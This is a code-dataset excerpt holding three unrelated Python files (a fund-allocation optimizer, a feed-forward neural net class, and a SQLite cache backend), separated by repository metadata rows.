'Large Blend' : { 'stock_us' : 1 },
'Intermediate-Term Bond' : { 'bond_us' : 1 },
'Foreign Small/Mid Blend' : { 'stock_intl' : 1 },
'Small Value' : { 'stock_us' : 1 },
'World Bond' : { 'bond_intl' : 1 }
}
assets = {'401k' : { 'VEMPX' : 1000,
'VTPSX' : 1000,
'VGSNX' : 1000,
'VIIIX' : 1000,
'VBMPX' : 1000 },
'ira' : { 'VTIAX' : 1000,
'VTSAX' : 1000,
'VGSLX' : 1000,
'VTABX' : 1000 },
'personal' : { 'VTSAX' : 1000,
'VFWAX' : 1000 } }
funds = {}
for accounts in assets.keys():
for fund in assets[accounts].keys():
funds[fund] = {}
# Lookup current prices
for fund in funds.keys():
params = { 't' : 'XNAS:' + fund, 'region' : 'usa', 'culture' : 'en-US',
'cur' : 'USD'}
r = requests.get('http://quotes.morningstar.com/fund/c-header',
params=params)
tree = etree.fromstring(r.text, etree.HTMLParser())
funds[fund]['price'] = float(tree.xpath(
"//span[@vkey='NAV']/text()")[0].strip())
funds[fund]['er'] = float(tree.xpath(
"//span[@vkey='ExpenseRatio']/text()")[0].strip().rstrip('%'))
composition = category[tree.xpath(
"//span[@vkey='MorningstarCategory']/text()")[0].strip()]
funds[fund]['composition'] = composition
print fund, '@', funds[fund]['price'], funds[fund]['er']
account_value = {}
for account in assets.keys():
account_value[account] = sum([ shares * funds[fund]['price']
for (fund, shares)
in assets[account].items() ])
print '%s value: %0.2f' % (account, account_value[account])
v_total = sum(account_value.values())
ideal_value = {}
for asset_class in allocation.keys():
ideal_value[asset_class] = allocation[asset_class] * v_total
shares = {}
for account in assets.keys():
shares[account] = {}
for fund in assets[account]:
shares[account][fund] = LpVariable(account + ':' + fund, 0, None)
# Minimize average expense ratio
prob += (sum([funds[x]['er'] * funds[x]['price'] * shares['401k'][x] for x in
shares['401k'].keys()]) +
sum([funds[x]['er'] * funds[x]['price'] * shares['ira'][x] for x in
shares['ira'].keys()]) +
sum([funds[x]['er'] * funds[x]['price'] * shares['personal'][x] for x in
shares['personal'].keys()]))
# Total account values are fixed
for account in account_value.keys():
prob += (sum([funds[x]['price'] * shares[account][x] for x in
shares[account].keys()]) == account_value[account])
# Use VIIIX and VEMPX to approximate total market
prob += (0.18 * funds['VIIIX']['price'] * shares['401k']['VIIIX'] -
0.82 * funds['VEMPX']['price'] * shares['401k']['VEMPX'] == 0)
# Set up the asset allocation constraints for a given account and asset class
def asset_class_allocation_constraints(account, asset_class):
return sum([funds[fund]['composition'][asset_class] *
funds[fund]['price'] *
shares[account][fund] for fund in shares[account].keys()
if asset_class in funds[fund]['composition']])
# Ensure individual asset allocations
for asset_class in allocation.keys():
prob += (sum([
asset_class_allocation_constraints(account, asset_class)
for account in assets.keys() ]) ==
ideal_value[asset_class])
# Admiral minima + 10%
prob += (funds['VTSAX']['price'] * shares['ira']['VTSAX'] >= 11000)
prob += (funds['VGSLX']['price'] * shares['ira']['VGSLX'] >= 11000)
prob += (funds['VFWAX']['price'] * shares['personal']['VFWAX'] >= 11000)
prob.solve()
print "Status: ", LpStatus[prob.status]
for v in prob.variables():
print "%s: %f ($%0.2f)" % (v.name, v.varValue, funds[v.name.split(':')[1]]['price'] * v.varValue)
print "Total cost", value(prob.objective)/v_total
| apache-2.0 | 2,496,520,912,736,537,600 | 37.635593 | 101 | 0.528844 | false |
elkingtowa/nn | deepnet/neuralnet.py | 9 | 24100 | """Implements a feed-forward neural net."""
import gzip
import logging
import sys
import time
from google.protobuf import text_format
from datahandler import *
from convolutions import *
from edge import *
from layer import *
from util import *
from logistic_layer import *
from tanh_layer import *
from relu_layer import *
from smooth_relu_layer import *
from linear_layer import *
from softmax_layer import *
from replicated_softmax_layer import *
from cos_layer import *
from sin_layer import *
from transfer_edge import *
from soft_transfer_edge import *
class NeuralNet(object):
def __init__(self, net, t_op=None, e_op=None):
self.net = None
if isinstance(net, deepnet_pb2.Model):
self.net = net
elif isinstance(net, str) or isinstance(net, unicode):
self.net = ReadModel(net)
self.t_op = None
if isinstance(t_op, deepnet_pb2.Operation):
self.t_op = t_op
elif isinstance(t_op, str) or isinstance(net, unicode):
self.t_op = ReadOperation(t_op)
self.e_op = None
if isinstance(e_op, deepnet_pb2.Operation):
self.e_op = e_op
elif isinstance(e_op, str) or isinstance(net, unicode):
self.e_op = ReadOperation(e_op)
cm.CUDAMatrix.init_random(self.net.seed)
np.random.seed(self.net.seed)
self.data = None
self.layer = []
self.edge = []
self.input_datalayer = []
self.output_datalayer = []
self.datalayer = []
self.tied_datalayer = []
self.unclamped_layer = []
self.verbose = False
self.batchsize = 0
if self.t_op:
self.verbose = self.t_op.verbose
self.batchsize = self.t_op.batchsize
elif self.e_op:
self.verbose = self.e_op.verbose
self.batchsize = self.e_op.batchsize
self.train_stop_steps = sys.maxint
def PrintNetwork(self):
for layer in self.layer:
print layer.name
layer.PrintNeighbours()
def DeepCopy(self):
return CopyModel(self.net)
def LoadModelOnGPU(self, batchsize=-1):
"""Load the model on the GPU."""
if batchsize < 0:
if self.t_op:
batchsize=self.t_op.batchsize
else:
batchsize=self.e_op.batchsize
for layer in self.net.layer:
layer.hyperparams.MergeFrom(LoadMissing(layer.hyperparams,
self.net.hyperparams))
if not layer.prefix:
layer.prefix = self.net.prefix
tied_to = None
if layer.tied:
tied_to = next(l for l in self.layer if l.name == layer.tied_to)
self.layer.append(CreateLayer(Layer, layer, self.t_op, tied_to=tied_to))
for edge in self.net.edge:
hyp = deepnet_pb2.Hyperparams()
hyp.CopyFrom(self.net.hyperparams)
hyp.MergeFrom(edge.hyperparams)
edge.hyperparams.MergeFrom(hyp)
try:
node1 = next(layer for layer in self.layer if layer.name == edge.node1)
except StopIteration:
print edge.node1, [l.name for l in self.layer]
node2 = next(layer for layer in self.layer if layer.name == edge.node2)
if not edge.prefix:
edge.prefix = self.net.prefix
tied_to = None
if edge.tied:
tied_to = next(e for e in self.edge if e.node1.name == edge.tied_to_node1 and e.node2.name == edge.tied_to_node2)
self.edge.append(CreateEdge(Edge, edge, node1, node2, self.t_op, tied_to=tied_to))
self.input_datalayer = [node for node in self.layer if node.is_input]
self.output_datalayer = [node for node in self.layer if node.is_output]
self.node_list = self.Sort()
def ExchangeGlobalInfo(self):
for layer in self.layer:
layer.GetGlobalInfo(self)
for edge in self.edge:
edge.GetGlobalInfo(self)
def Sort(self):
"""Topological sort."""
node_list = []
S = [node for node in self.layer if not node.incoming_neighbour]
while S:
n = S.pop()
node_list.append(n)
for m in n.outgoing_edge:
if m.marker == 0:
m.marker = 1
if reduce(lambda a, edge: a and edge.marker == 1,
m.node2.incoming_edge, True):
S.append(m.node2)
if reduce(lambda a, edge: a and edge.marker == 1, self.edge, True):
if self.verbose:
print 'Fprop Order:'
for node in node_list:
print node.name
else:
raise Exception('Invalid net for backprop. Cycle exists.')
return node_list
def ComputeUp(self, layer, train=False, step=0, maxsteps=0):
"""
Computes the state of `layer', given the state of its incoming neighbours.
Args:
layer: Layer whose state is to be computed.
train: True if this computation is happening during training, False during
evaluation.
step: Training step.
maxsteps: Maximum number of steps that will be taken (Needed because some
hyperparameters may depend on this).
"""
layer.dirty = False
perf = None
if layer.is_input or layer.is_initialized:
layer.GetData()
else:
for i, edge in enumerate(layer.incoming_edge):
if edge in layer.outgoing_edge:
continue
inputs = layer.incoming_neighbour[i].state
if edge.conv or edge.local:
if i == 0:
ConvolveUp(inputs, edge, layer.state)
else:
AddConvoleUp(inputs, edge, layer.state)
else:
w = edge.params['weight']
factor = edge.proto.up_factor
if i == 0:
cm.dot(w.T, inputs, target=layer.state)
if factor != 1:
layer.state.mult(factor)
else:
layer.state.add_dot(w.T, inputs, mult=factor)
b = layer.params['bias']
if layer.replicated_neighbour is None:
layer.state.add_col_vec(b)
else:
layer.state.add_dot(b, layer.replicated_neighbour.NN)
layer.ApplyActivation()
if layer.hyperparams.sparsity:
layer.state.sum(axis=1, target=layer.dimsize)
perf = deepnet_pb2.Metrics()
perf.MergeFrom(layer.proto.performance_stats)
perf.count = layer.batchsize
perf.sparsity = layer.dimsize.sum() / layer.dimsize.shape[0]
if layer.hyperparams.dropout:
if train and maxsteps - step >= layer.hyperparams.stop_dropout_for_last:
# Randomly set states to zero.
if layer.hyperparams.mult_dropout:
layer.mask.fill_with_randn()
layer.mask.add(1)
layer.state.mult(layer.mask)
else:
layer.mask.fill_with_rand()
layer.mask.greater_than(layer.hyperparams.dropout_prob)
if layer.hyperparams.blocksize > 1:
layer.mask.blockify(layer.hyperparams.blocksize)
layer.state.mult(layer.mask)
else:
# Produce expected output.
if layer.hyperparams.mult_dropout:
pass
else:
layer.state.mult(1.0 - layer.hyperparams.dropout_prob)
return perf
def ComputeDown(self, layer, step):
"""Backpropagate through this layer.
Args:
step: The training step. Needed because some hyperparameters depend on
which training step they are being used in.
"""
if layer.is_input: # Nobody to backprop to.
return
# At this point layer.deriv contains the derivative with respect to the
# outputs of this layer. Compute derivative with respect to the inputs.
if layer.is_output:
loss = layer.GetLoss(get_deriv=True)
else:
loss = None
if layer.hyperparams.sparsity:
sparsity_gradient = layer.GetSparsityGradient()
layer.deriv.add_col_vec(sparsity_gradient)
layer.ComputeDeriv()
# Now layer.deriv contains the derivative w.r.t to the inputs.
# Send it down each incoming edge and update parameters on the edge.
for edge in layer.incoming_edge:
if edge.conv or edge.local:
AccumulateConvDeriv(edge.node1, edge, layer.deriv)
else:
self.AccumulateDeriv(edge.node1, edge, layer.deriv)
self.UpdateEdgeParams(edge, layer.deriv, step)
# Update the parameters on this layer (i.e., the bias).
self.UpdateLayerParams(layer, step)
return loss
def AccumulateDeriv(self, layer, edge, deriv):
"""Accumulate the derivative w.r.t the outputs of this layer.
A layer needs to compute derivatives w.r.t its outputs. These outputs may
have been connected to lots of other nodes through outgoing edges.
This method adds up the derivatives contributed by each outgoing edge.
It gets derivatives w.r.t the inputs at the other end of its outgoing edge.
Args:
edge: The edge which is sending the derivative.
deriv: The derivative w.r.t the inputs at the other end of this edge.
"""
if layer.is_input or edge.proto.block_gradient:
return
if layer.dirty: # If some derivatives have already been received.
layer.deriv.add_dot(edge.params['weight'], deriv)
else: # Receiving derivative for the first time.
cm.dot(edge.params['weight'], deriv, target=layer.deriv)
layer.dirty = True
def UpdateEdgeParams(self, edge, deriv, step):
""" Update the parameters associated with this edge.
Update the weights and associated parameters.
Args:
deriv: Gradient w.r.t the inputs at the outgoing end.
step: Training step.
"""
numcases = edge.node1.batchsize
if edge.conv or edge.local:
ConvOuter(edge, edge.temp)
edge.gradient.add_mult(edge.temp, mult=1.0/numcases)
else:
edge.gradient.add_dot(edge.node1.state, deriv.T, mult=1.0/numcases)
if edge.tied_to:
edge.tied_to.gradient.add(edge.gradient)
edge.gradient.assign(0)
edge = edge.tied_to
edge.num_grads_received += 1
if edge.num_grads_received == edge.num_shares:
edge.Update('weight', step)
def UpdateLayerParams(self, layer, step):
""" Update the parameters associated with this layer.
Update the bias.
Args:
step: Training step.
"""
layer.gradient.add_sums(layer.deriv, axis=1, mult=1.0 / layer.batchsize)
if layer.tied_to:
layer.tied_to.gradient.add(layer.gradient)
layer.gradient.assign(0)
layer = layer.tied_to
layer.num_grads_received += 1
if layer.num_grads_received == layer.num_shares:
layer.Update('bias', step, no_reg=True) # By default, do not regularize bias.
def ForwardPropagate(self, train=False, step=0):
"""Do a forward pass through the network.
Args:
train: True if the forward pass is done during training, False during
evaluation.
step: Training step.
"""
losses = []
for node in self.node_list:
loss = self.ComputeUp(node, train, step, self.train_stop_steps)
if loss:
losses.append(loss)
return losses
def BackwardPropagate(self, step):
"""Backprop through the network.
Args:
step: Training step.
"""
losses = []
for node in reversed(self.node_list):
loss = self.ComputeDown(node, step)
if loss:
losses.append(loss)
return losses
def TrainOneBatch(self, step):
"""Train once on one mini-batch.
Args:
step: Training step.
Returns:
List of losses incurred at each output layer.
"""
losses1 = self.ForwardPropagate(train=True)
losses2 = self.BackwardPropagate(step)
losses1.extend(losses2)
return losses1
def EvaluateOneBatch(self):
"""Evaluate one mini-batch."""
losses = self.ForwardPropagate()
losses.extend([node.GetLoss() for node in self.output_datalayer])
return losses
def Evaluate(self, validation=True, collect_predictions=False):
"""Evaluate the model.
Args:
validation: If True, evaluate on the validation set,
else evaluate on test set.
collect_predictions: If True, collect the predictions.
"""
step = 0
stats = []
if validation:
stopcondition = self.ValidationStopCondition
stop = stopcondition(step)
if stop or self.validation_data_handler is None:
return
datagetter = self.GetValidationBatch
prefix = 'V'
stats_list = self.net.validation_stats
num_batches = self.validation_data_handler.num_batches
else:
stopcondition = self.TestStopCondition
stop = stopcondition(step)
if stop or self.test_data_handler is None:
return
datagetter = self.GetTestBatch
prefix = 'E'
stats_list = self.net.test_stats
num_batches = self.test_data_handler.num_batches
if collect_predictions:
output_layer = self.output_datalayer[0]
collect_pos = 0
batchsize = output_layer.batchsize
numdims = output_layer.state.shape[0]
predictions = np.zeros((batchsize * num_batches, numdims))
targets = np.zeros(predictions.shape)
while not stop:
datagetter()
losses = self.EvaluateOneBatch()
if collect_predictions:
predictions[collect_pos:collect_pos + batchsize] = \
output_layer.state.asarray().T
targets[collect_pos:collect_pos + batchsize] = \
output_layer.data.asarray().T
collect_pos += batchsize
if stats:
for loss, acc in zip(losses, stats):
Accumulate(acc, loss)
else:
stats = losses
step += 1
stop = stopcondition(step)
if collect_predictions and stats:
predictions = predictions[:collect_pos]
targets = targets[:collect_pos]
MAP, prec50, MAP_list, prec50_list = self.ComputeScore(predictions, targets)
stat = stats[0]
stat.MAP = MAP
stat.prec50 = prec50
for m in MAP_list:
stat.MAP_list.extend([m])
for m in prec50_list:
stat.prec50_list.extend([m])
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix=prefix))
stats_list.extend(stats)
def ScoreOneLabel(self, preds, targets):
"""Computes Average precision and precision at 50."""
targets_sorted = targets[(-preds.T).argsort().flatten(),:]
cumsum = targets_sorted.cumsum()
prec = cumsum / np.arange(1.0, 1 + targets.shape[0])
total_pos = float(sum(targets))
if total_pos == 0:
total_pos = 1e-10
recall = cumsum / total_pos
ap = np.dot(prec, targets_sorted) / total_pos
prec50 = prec[50]
return ap, prec50
def ComputeScore(self, preds, targets):
"""Computes Average precision and precision at 50."""
assert preds.shape == targets.shape
numdims = preds.shape[1]
ap = 0
prec = 0
ap_list = []
prec_list = []
for i in range(numdims):
this_ap, this_prec = self.ScoreOneLabel(preds[:,i], targets[:,i])
ap_list.append(this_ap)
prec_list.append(this_prec)
ap += this_ap
prec += this_prec
ap /= numdims
prec /= numdims
return ap, prec, ap_list, prec_list
def WriteRepresentationToDisk(self, layernames, output_dir, memory='1G',
dataset='test', drop=False):
layers = [self.GetLayerByName(lname) for lname in layernames]
numdim_list = [layer.state.shape[0] for layer in layers]
if dataset == 'train':
datagetter = self.GetTrainBatch
if self.train_data_handler is None:
return
numbatches = self.train_data_handler.num_batches
size = numbatches * self.train_data_handler.batchsize
elif dataset == 'validation':
datagetter = self.GetValidationBatch
if self.validation_data_handler is None:
return
numbatches = self.validation_data_handler.num_batches
size = numbatches * self.validation_data_handler.batchsize
elif dataset == 'test':
datagetter = self.GetTestBatch
if self.test_data_handler is None:
return
numbatches = self.test_data_handler.num_batches
size = numbatches * self.test_data_handler.batchsize
datawriter = DataWriter(layernames, output_dir, memory, numdim_list, size)
for batch in range(numbatches):
datagetter()
sys.stdout.write('\r%d' % (batch+1))
sys.stdout.flush()
self.ForwardPropagate(train=drop)
reprs = [l.state.asarray().T for l in layers]
datawriter.Submit(reprs)
sys.stdout.write('\n')
return datawriter.Commit()
def TrainStopCondition(self, step):
return step >= self.train_stop_steps
def ValidationStopCondition(self, step):
return step >= self.validation_stop_steps
def TestStopCondition(self, step):
return step >= self.test_stop_steps
def EvalNow(self, step):
return step % self.eval_now_steps == 0
def SaveNow(self, step):
return step % self.save_now_steps == 0
def ShowNow(self, step):
return self.show_now_steps > 0 and step % self.show_now_steps == 0
def GetLayerByName(self, layername, down=False):
try:
l = next(l for l in self.layer if l.name == layername)
except StopIteration:
l = None
return l
def CopyModelToCPU(self):
for layer in self.layer:
layer.SaveParameters()
for edge in self.edge:
edge.SaveParameters()
def ResetBatchsize(self, batchsize):
self.batchsize = batchsize
for layer in self.layer:
layer.AllocateBatchsizeDependentMemory(batchsize)
for edge in self.edge:
edge.AllocateBatchsizeDependentMemory()
def GetBatch(self, handler=None):
if handler:
data_list = handler.Get()
if data_list[0].shape[1] != self.batchsize:
self.ResetBatchsize(data_list[0].shape[1])
for i, layer in enumerate(self.datalayer):
layer.SetData(data_list[i])
for layer in self.tied_datalayer:
data = layer.data_tied_to.data
if data.shape[1] != self.batchsize:
self.ResetBatchsize(data.shape[1])
layer.SetData(data)
def GetTrainBatch(self):
self.GetBatch(self.train_data_handler)
def GetValidationBatch(self):
self.GetBatch(self.validation_data_handler)
def GetTestBatch(self):
self.GetBatch(self.test_data_handler)
def SetUpData(self, skip_outputs=False, skip_layernames=[]):
"""Setup the data."""
hyp_list = []
name_list = [[], [], []]
for node in self.layer:
if not (node.is_input or node.is_output):
continue
if skip_outputs and node.is_output:
continue
if node.name in skip_layernames:
continue
data_field = node.proto.data_field
if data_field.tied:
self.tied_datalayer.append(node)
node.data_tied_to = next(l for l in self.datalayer\
if l.name == data_field.tied_to)
else:
self.datalayer.append(node)
hyp_list.append(node.hyperparams)
if data_field.train:
name_list[0].append(data_field.train)
if data_field.validation:
name_list[1].append(data_field.validation)
if data_field.test:
name_list[2].append(data_field.test)
if self.t_op:
op = self.t_op
else:
op = self.e_op
handles = GetDataHandles(op, name_list, hyp_list,
verbose=self.verbose)
self.train_data_handler = handles[0]
self.validation_data_handler = handles[1]
self.test_data_handler = handles[2]
def SetUpTrainer(self):
"""Load the model, setup the data, set the stopping conditions."""
self.LoadModelOnGPU()
if self.verbose:
self.PrintNetwork()
self.SetUpData()
if self.t_op.stopcondition.all_processed:
num_steps = self.train_data_handler.num_batches
else:
num_steps = self.t_op.stopcondition.steps
self.train_stop_steps = num_steps
if self.e_op.stopcondition.all_processed and self.validation_data_handler:
num_steps = self.validation_data_handler.num_batches
else:
num_steps = self.e_op.stopcondition.steps
self.validation_stop_steps = num_steps
if self.e_op.stopcondition.all_processed and self.test_data_handler:
num_steps = self.test_data_handler.num_batches
else:
num_steps = self.e_op.stopcondition.steps
self.test_stop_steps = num_steps
self.eval_now_steps = self.t_op.eval_after
self.save_now_steps = self.t_op.checkpoint_after
self.show_now_steps = self.t_op.show_after
self.ExchangeGlobalInfo()
def Show(self):
"""Visualize the state of the layers and edges in the network."""
for layer in self.layer:
layer.Show()
for edge in self.edge:
edge.Show()
def Train(self):
"""Train the model."""
assert self.t_op is not None, 't_op is None.'
assert self.e_op is not None, 'e_op is None.'
self.SetUpTrainer()
step = self.t_op.current_step
stop = self.TrainStopCondition(step)
stats = []
collect_predictions = False
try:
p = self.output_datalayer[0].proto.performance_stats
if p.compute_MAP or p.compute_prec50:
collect_predictions = True
except Exception as e:
pass
select_model_using_error = self.net.hyperparams.select_model_using_error
select_model_using_acc = self.net.hyperparams.select_model_using_acc
select_model_using_map = self.net.hyperparams.select_model_using_map
select_best = select_model_using_error or select_model_using_acc or select_model_using_map
if select_best:
best_valid_error = float('Inf')
test_error = float('Inf')
best_net = self.DeepCopy()
dump_best = False
while not stop:
sys.stdout.write('\rTrain Step: %d' % step)
sys.stdout.flush()
self.GetTrainBatch()
losses = self.TrainOneBatch(step)
if stats:
for acc, loss in zip(stats, losses):
Accumulate(acc, loss)
else:
stats = losses
step += 1
if self.ShowNow(step):
self.Show()
if self.EvalNow(step):
# Print out training stats.
sys.stdout.write('\rStep %d ' % step)
for stat in stats:
sys.stdout.write(GetPerformanceStats(stat, prefix='T'))
self.net.train_stats.extend(stats)
stats = []
# Evaluate on validation set.
self.Evaluate(validation=True, collect_predictions=collect_predictions)
# Evaluate on test set.
self.Evaluate(validation=False, collect_predictions=collect_predictions)
if select_best:
valid_stat = self.net.validation_stats[-1]
if len(self.net.test_stats) > 1:
test_stat = self.net.test_stats[-1]
else:
test_stat = valid_stat
if select_model_using_error:
valid_error = valid_stat.error / valid_stat.count
_test_error = test_stat.error / test_stat.count
elif select_model_using_acc:
valid_error = 1 - float(valid_stat.correct_preds) / valid_stat.count
_test_error = 1 - float(test_stat.correct_preds) / test_stat.count
elif select_model_using_map:
valid_error = 1 - valid_stat.MAP
_test_error = 1 - test_stat.MAP
if valid_error < best_valid_error:
best_valid_error = valid_error
test_error = _test_error
dump_best = True
self.CopyModelToCPU()
self.t_op.current_step = step
self.net.best_valid_stat.CopyFrom(valid_stat)
self.net.train_stat_es.CopyFrom(self.net.train_stats[-1])
self.net.test_stat_es.CopyFrom(test_stat)
best_net = self.DeepCopy()
best_t_op = CopyOperation(self.t_op)
#for e in self.edge:
# sys.stdout.write(' %s %.3f' % (e.name, e.params['weight'].euclid_norm()))
sys.stdout.write('\n')
if self.SaveNow(step):
self.t_op.current_step = step
self.CopyModelToCPU()
util.WriteCheckpointFile(self.net, self.t_op)
if dump_best:
dump_best = False
if select_model_using_error:
print 'Best valid error : %.4f Test error %.4f' % (best_valid_error, test_error)
elif select_model_using_acc:
print 'Best valid acc : %.4f Test acc %.4f' % (1-best_valid_error, 1-test_error)
elif select_model_using_map:
print 'Best valid MAP : %.4f Test MAP %.4f' % (1-best_valid_error, 1-test_error)
util.WriteCheckpointFile(best_net, best_t_op, best=True)
stop = self.TrainStopCondition(step)
| mit | 9,203,731,572,917,769,000 | 33.626437 | 121 | 0.638216 | false |
dibaunaumh/pycache | storage/sqlite.py | 1 | 2363 | __author__ = 'Jake Wharton'
__author_email__ = '[email protected]'
__url__ = 'http://mine.jakewharton.com/projects/show/pycache'
__revision__ = "$Rev$"[6:-2]
__license__ = '''
Copyright 2009 Jake Wharton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
import sqlite3
from pycache import PyCache
from storage import storage
from time import time
class SQLite(storage):
def __init__(self, **kwargs):
if 'file' in kwargs:
self.file = kwargs['file']
else:
self.file = 'PyCache.db'
self.conn = sqlite3.connect(self.file)
self.curs = self.conn.cursor()
if 'table' in kwargs:
self.table = kwargs['table'] + '_' + PyCache.TABLE
else:
self.table = PyCache.TABLE
def create(self):
self.curs.execute("CREATE TABLE %s (%s VARCHAR(32) PRIMARY KEY, %s TEXT, %s INTEGER)" % (self.table, PyCache.KEY, PyCache.VALUE, PyCache.EXPIRES))
self.curs.execute("CREATE INDEX %s_%s ON %s (%s)" % (self.table, PyCache.EXPIRES, self.table, PyCache.EXPIRES))
def store(self, key, value, expires):
self.curs.execute("REPLACE INTO %s (%s, %s, %s) VALUES (?, ?, ?)" % (self.table, PyCache.KEY, PyCache.VALUE, PyCache.EXPIRES), (key, value, expires))
def fetch(self, key):
self.curs.execute("SELECT %s, %s FROM %s WHERE %s=?" % (PyCache.VALUE, PyCache.EXPIRES, self.table, PyCache.KEY), (key,))
result = self.curs.fetchone()
if not result:
return False
return {PyCache.VALUE: result[0], PyCache.EXPIRES: int(result[1])}
def expire(self, key):
self.curs.execute("REPLACE INTO %s (%s, %s) VALUES (?, ?)" % (self.table, PyCache.KEY, PyCache.EXPIRES), (key, time()))
def gc(self):
self.curs.execute("DELETE FROM %s WHERE %s < ?" % (self.table, PyCache.EXPIRES), (time(),)) | apache-2.0 | -1,961,284,187,903,795,500 | 40.473684 | 157 | 0.639018 | false |
Subsets and Splits